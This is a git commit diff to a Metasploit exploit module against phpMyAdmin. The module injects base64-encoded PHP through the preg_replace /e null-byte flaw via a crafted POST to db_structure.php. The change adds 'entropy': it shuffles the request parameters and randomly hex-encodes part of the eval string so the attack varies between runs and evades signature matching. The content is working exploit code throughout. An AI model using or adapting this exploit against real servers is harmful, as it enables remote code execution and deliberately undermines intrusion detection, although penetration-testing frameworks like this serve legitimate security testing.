Add some entropy in request

2013-04-26 17:34:17 +01:00 · 2013-04-26 17:34:17 +01:00 · c8da13cfa0
parent a043d3b456
commit c8da13cfa0
1 changed files with 19 additions and 9 deletions
--- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb
+++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb
@ -156,19 +156,29 @@ class Metasploit3 < Msf::Exploit::Remote

 		db = rand_text_alpha(3+rand(3))
 		pay = Rex::Text.encode_base64(payload.encoded)
-		evil = "query_type=replace_prefix_tbl"
-		evil << "&db=#{db}"
-		evil << "&selected%5B0%5D=#{db}"
-		evil << "&token=#{token}"
-		evil << "&from_prefix=%2Fe%00"
-		evil << "&to_prefix=eval(base64_decode('#{pay}'))"
-		evil << "&mult_btn=Yes"
+		evil = []
+		evil << "query_type=replace_prefix_tbl"
+		evil << "db=#{db}"
+		evil << "selected%5B0%5D=#{db}"
+		evil << "token=#{token}"
+		evil << "from_prefix=%2Fe%00"
+		evil << "to_prefix=#{Rex::Text.uri_encode('eval(base64_decode(', 'hex-random')}'#{pay}'))"
+		evil << "mult_btn=Yes"

-		print_status("Sending exploit payload")
+		data = ""
+		evil.shuffle!
+		0.upto(evil.count-1) do |i|
+			if i == 0
+				data << evil[i]
+			else
+				data << '&' << evil[i]
+			end
+		end
+			
 		exploit_result = send_request_raw({
 			'uri'	  => uri('db_structure.php'),
 			'method'  => 'POST',
-			'data'	  => evil,
+			'data'	  => data,
 			'cookie'  => cookie,
 			'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
 		},2)